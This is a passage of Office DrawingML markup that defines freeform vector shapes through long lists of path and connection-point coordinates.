                  <a:lnTo>
                    <a:pt x="1030" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1024" y="201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1013" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1007" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1001" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="996" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="988" y="224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="984" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="971" y="237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965" y="243"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="961" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="950" y="258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="944" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="940" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="929" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923" y="283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="918" y="289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="914" y="294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="908" y="300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="902" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="899" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="893" y="317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="889" y="323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="883" y="327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878" y="333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="872" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="868" y="342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="849" y="361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="813" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="804" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="794" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="787" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="767" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="760" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="728" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720" y="405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712" y="403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="705" y="399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697" y="395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691" y="393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="676" y="386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663" y="376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="657" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="652" y="365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="644" y="359"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638" y="353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="631" y="346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625" y="338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617" y="329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612" y="321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608" y="315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="606" y="312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602" y="306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598" y="302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="595" y="296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589" y="287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585" y="281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="577" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="572" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="570" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="564" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562" y="241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="553" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541" y="207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524" y="177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="517" y="163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="515" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509" y="148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507" y="142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496" y="119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496" y="119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auto">
            <a:xfrm>
              <a:off x="4316" y="1619"/>
              <a:ext cx="124" cy="133"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="230" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="42"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="228" y="52"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="227" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="225" y="80"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="223" y="94"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="223" y="103"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="219" y="116"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="217" y="132"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="215" y="141"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="211" y="153"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="204" y="168"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="181"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="181" y="193"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="168" y="202"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="151" y="210"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="215"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="128" y="219"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="223"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="101" y="229"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="92" y="231"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="80" y="233"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="71" y="234"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="57" y="236"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="240"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="25" y="242"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="12" y="244"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="246"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="35" y="267"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="265"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="54" y="263"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="69" y="263"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="259"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="99" y="255"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="114" y="252"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="130" y="246"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="145" y="240"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="158" y="233"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="227"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="185" y="221"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="213"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="208" y="204"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="217" y="194"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="227" y="181"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="166"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="238" y="149"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="242" y="132"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="246" y="113"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="247" y="103"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="247" y="94"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="77"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="46"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="33"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="10"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="246" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="240" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="18"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="31"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="37"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="249" h="267">
                  <a:moveTo>
                    <a:pt x="232" y="37"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="230" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="39"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223" y="109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204" y="168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128" y="219"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71" y="234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75" y="261"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122" y="250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130" y="246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164" y="231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="185" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208" y="204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227" y="181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="97"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="94"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="77"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="46"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="39"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="18"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="35"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="37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4473" y="1694"/>
              <a:ext cx="135" cy="140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140"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="131"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="101"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="83"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="32" y="66"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="59" y="34"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="72" y="24"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="82" y="19"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="91" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="101" y="9"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="110" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="120" y="5"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="135" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="163" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="173" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="175" y="7"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="179" y="17"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="182" y="26"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="188" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="201" y="62"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="211" y="74"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="220" y="85"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="232" y="95"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="241" y="102"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="255" y="114"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="268" y="121"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="268" y="123"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="262" y="123"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="251" y="125"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="236" y="131"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="218" y="137"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="199" y="144"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="182" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="169" y="167"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="158" y="180"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="152" y="198"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="146" y="213"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="142" y="230"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="141" y="247"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="260"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="272"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="277"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="139" y="277"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="266"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="123" y="257"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="116" y="245"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="232"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="220"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="84" y="209"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="70" y="199"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="57" y="188"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="44" y="179"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="30" y="169"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="161"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="9" y="154"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="148"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="148"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="270" h="279">
                  <a:moveTo>
                    <a:pt x="0" y="148"/>
                  </a:move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2" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="93"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="83"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="76"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32" y="66"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="42"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="24"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
